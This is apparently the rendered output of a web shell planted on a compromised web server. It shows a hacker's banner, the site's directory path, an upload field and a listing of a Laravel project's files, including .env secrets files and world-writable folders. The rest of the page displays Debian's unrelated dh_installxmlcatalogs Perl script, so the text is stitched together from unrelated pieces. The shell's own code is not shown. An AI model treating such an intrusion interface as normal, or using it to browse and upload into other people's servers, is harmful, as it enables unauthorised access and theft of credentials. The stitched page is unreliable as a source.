I am a hacker in the dark of a very cold night

path :/var/www/html/vorne.webheaydemo.com

upload file:

List of files:

name file size edit permission action
.editorconfig276 KBMarch 05 2024 07:12:340666
.env1385 KBMay 24 2024 16:43:550666
.env.example1088 KBMarch 05 2024 07:12:340666
.gitattributes190 KBMarch 05 2024 07:12:340666
.gitignore245 KBMarch 05 2024 07:12:340666
.htaccess947 KBJuly 04 2023 21:25:080664
.rnd1024 KBMarch 13 2024 04:51:140666
README.md472 KBMarch 22 2024 10:35:000666
app-March 05 2024 07:12:340777
artisan1739 KBMarch 05 2024 07:12:340666
bootstrap-March 05 2024 07:12:340777
composer.json2829 KBMay 13 2024 12:10:040666
composer.lock417205 KBMarch 19 2024 12:13:140666
config-July 03 2025 02:53:360777
database-March 05 2024 07:12:340777
index.php1816 KBMay 13 2024 10:32:360666
lang-May 13 2024 14:53:260777
manifest.json913 KBMay 14 2024 03:57:260664
package.json398 KBMarch 05 2024 07:12:340666
phpunit.xml1206 KBMarch 05 2024 07:12:340666
public-July 03 2025 02:37:200777
resources-May 13 2024 12:09:360777
routes-March 05 2024 07:12:340777
service-worker.js924 KBMarch 05 2024 07:12:340666
storage-March 05 2024 10:03:520777
symlink.php218 KBMarch 05 2024 07:12:340666
tests-March 05 2024 07:12:340777
vendor-March 19 2024 12:13:140777
vite.config.js326 KBMarch 05 2024 07:12:340666
#!/usr/bin/perl -w ## ---------------------------------------------------------------------- ## Debian dh_installxmlcatalogs ## ---------------------------------------------------------------------- ## Copyright (c) 2004 Ardo van Rangelrooij, Adam Di Carlo ## ## This is free software; see the GNU General Public Licence version 2 ## or later for copying conditions. There is NO warranty. ## ---------------------------------------------------------------------- =head1 NAME dh_installxmlcatalogs - install and register XML catalog files =head1 SYNOPSIS B [S>] [B<-n>] =head1 DESCRIPTION B is a debhelper program that installs and registers XML catalog files. It complies with the Debian XML/SGML policy. The file F.xmlcatalogs> lists the local XML catalog files to be installed per package as well as the XML entities in those local XML catalog files that are to be registered in the XML catalog system. The local XML catalog file entries in that file should be of the form C, where the verbatim C indicates this is an entry for a local XML catalog file, C indicates where the local XML catalog resides in the source tree, and C indicates the destination location for the local XML catalog under the package build area. C should start with F. The entries for the XML entities to be registered in the package XML catalog file should be of the form C, where the verbatim C indicates this is an entry for an XML entity to be registered in the package XML catalog file, C indicates the XML entity type (public, system, uri), C indicates the XML entity id, and C indicates the local XML catalog file. The entries for the XML entities to be registered in the root XML catalog file should be of the form C, where the verbatim C indicates this is an entry for an XML entity to be registered in the root XML catalog file, C indicates the XML entity type (public, system, uri), and C indicates the XML entity id. If an entry for is to be registered identically in the root catalog and the package catalog file, you can use the form C, where the verbatim C indicates this is an entry for an XML entity to be registered in both the root and package XML catalog files, C indicates the XML entity type (public, system, uri), C indicates the XML entity id, and C indicates the local XML catalog file. XML entity types are described in L. Using the C or C commands, a type of C will general C statements in the applicable catalog file. Generally you will want to use the types C for any formal public identifiers, and C for any files on the local filesystem or URLs. C is only used for non-local files which are not part of the external document subset, e.g., they are not used for entities or DTDs. B automatically adds maintainer script snippets for the registration and unregistration of the listed XML entities in the XML catalog system (unless B<-n> is used). A dependency on the B package will be added to C<${misc:Depends}>, so be sure to use that variable in the file F. See L for an explanation of Debhelper maintainer script snippets. =head1 OPTIONS =over 4 =item B<-n>, B<--noscripts> Do not modify F/F/F scripts. =back =head1 NOTES Note that this command is not idempotent. "dh_clean -k" should be called between invocations of this command. Otherwise, it may cause multiple instances of the same text to be added to maintainer scripts. =head1 SEE ALSO L F =head1 AUTHOR B Eardo@debian.orgE B Eaph@debian.orgE =cut ## ---------------------------------------------------------------------- use strict; ## ---------------------------------------------------------------------- use Debian::Debhelper::Dh_Lib; use Debian::Debhelper::Dh_Version; ## ---------------------------------------------------------------------- my $xmlcorever = "0.14"; ## ---------------------------------------------------------------------- my $debug_update_xmlcatalog = 0; ## ---------------------------------------------------------------------- init(); ## ---------------------------------------------------------------------- sub add_xmlcat_cmd ($$$;$) { my ($pkg, $type, $id, $local) = @_; my $cmd = 'update-xmlcatalog'; $cmd .= ' --sort'; $cmd .= ' --add'; $cmd .= " --type $type"; $cmd .= " --id \"$id\""; $cmd .= " --package $pkg"; if ( $local ) { $cmd .= " --local $local"; } else { $cmd .= " --root"; } $debug_update_xmlcatalog and $cmd .= ' --verbose'; return $cmd; } ## ---------------------------------------------------------------------- sub del_xmlcat_cmd ($$$;$) { my ($pkg, $type, $id, $root) = @_; my $cmd = 'update-xmlcatalog'; $cmd .= ' --del'; $cmd .= " --type $type"; $cmd .= " --id \"$id\""; if ( $root ) { $cmd .= " --root"; } else { $cmd .= " --package $pkg"; } $debug_update_xmlcatalog and $cmd .= ' --verbose'; $cmd .= ' || true'; return $cmd; } ## ---------------------------------------------------------------------- foreach my $package (@{$dh{DOPACKAGES}}) { if ($#ARGV >= 0) { error("extra command-line arguments"); } my $tmpdir = tmpdir($package); my $xmlcatlistfile = pkgfile( $package, "xmlcatalogs" ); if ( $xmlcatlistfile ) { my @xml_data = (); open ( DH_FARRAY_IN, $xmlcatlistfile ) || error( "cannot read $xmlcatlistfile: $1" ); while ( ) { chomp; s/#.*//; s/^\s+//; s/\s+$//; next unless length; my @line = split( /;/ ); push( @xml_data, [@line] ); } close( DH_FARRAY_IN ); my $packagecat = "/etc/xml/$package.xml"; my $ADD_PACKAGE = ''; my $ADD_ROOT = ''; my $DEL_PACKAGE = ''; my $DEL_ROOT = ''; foreach my $line ( @xml_data ) { if ( $line->[0] eq 'local' ) { my $source = $line->[1]; my $dest = $line->[2]; my $fulldest = "$tmpdir/$dest"; $fulldest =~ s|//|/|g; # beautification if ( ! -d dirname( $fulldest ) ) { doit( "install", "-d", "-m755", $tmpdir . "/" . dirname( $dest ) ); } doit( "install", "-p", "-m644", $source, $fulldest ); } elsif ( $line->[0] eq 'package' ) { if ( ! $dh{ NOSCRIPTS } ) { my $type = $line->[1]; my $id = $line->[2]; my $local = $line->[3]; if ( ! $local ) { die("error: package command with ID '$id' incorrect, must specify local catalog\n"); } elsif ( ! -f "$tmpdir/$local" ) { die("error: package command with ID '$id' uses non-existent catalog '$local'\n"); } $ADD_PACKAGE .= "\t" . add_xmlcat_cmd($package, $type, $id, $local) . "\n"; $DEL_PACKAGE .= "\t" . del_xmlcat_cmd($package, $type, $id) . "\n"; } } elsif ( $line->[0] eq 'root' ) { if ( ! $dh{ NOSCRIPTS } ) { my $type = $line->[1]; my $id = $line->[2]; $ADD_ROOT .= "\t" . add_xmlcat_cmd($package, $type, $id) . "\n"; $DEL_ROOT .= "\t" . del_xmlcat_cmd($package, $type, $id, 1) . "\n"; } } elsif ( $line->[0] eq 'root-and-package' ) { if ( ! $dh{ NOSCRIPTS } ) { my $type = $line->[1]; my $id = $line->[2]; my $local = $line->[3]; if ( ! $local ) { die("error: root-and-package command with ID '$id' incorrect, must specify local catalog\n"); } elsif ( ! -f "$tmpdir/$local" ) { die("error: root-and-package command with ID '$id' uses non-existent catalog '$local'\n"); } $ADD_PACKAGE .= "\t" . add_xmlcat_cmd($package, $type, $id, $local) . "\n"; $DEL_PACKAGE .= "\t" . del_xmlcat_cmd($package, $type, $id) . "\n"; $ADD_ROOT .= "\t" . add_xmlcat_cmd($package, $type, $id) . "\n"; $DEL_ROOT .= "\t" . del_xmlcat_cmd($package, $type, $id, 1) . "\n"; } } else { die("cannot understand command '" . $line->[0] . "' in file $xmlcatlistfile\n"); } } # sanity checking if ( $ADD_PACKAGE and not $ADD_ROOT ) { warn("warning: elements added to package XML catalog, but not entry for root catalog\n"); } if ( not $ADD_PACKAGE and not $ADD_ROOT ) { warning("warning: no catalogs registered\n"); } else { $ADD_PACKAGE or $ADD_PACKAGE = "\t:"; $ADD_ROOT or $ADD_ROOT = "\t:"; $DEL_PACKAGE or $DEL_PACKAGE = "\t:"; $DEL_ROOT or $DEL_ROOT = "\t:"; autoscript( $package, "postinst", "postinst-xmlcatalog", sub { s{#ADD_PACKAGE#}{$ADD_PACKAGE}g; s{#ADD_ROOT#}{$ADD_ROOT}g; } ); autoscript( $package, "prerm", "prerm-xmlcatalog", sub { s{#DEL_PACKAGE#}{$DEL_PACKAGE}g; s{#DEL_ROOT#}{$DEL_ROOT}g; } ); autoscript( $package, "postrm", "postrm-xmlcatalog", sub { s{#PACKAGECAT#}{$packagecat}g; } ); addsubstvar( $package, "misc:Depends", "xml-core", ">= $xmlcorever" ); # Make sure /etc/xml exists (see http://bugs.debian.org/411770). if (! -d "$tmpdir/etc/xml") { doit("install","-d","-m755","$tmpdir/etc/xml"); } } } } ## ----------------------------------------------------------------------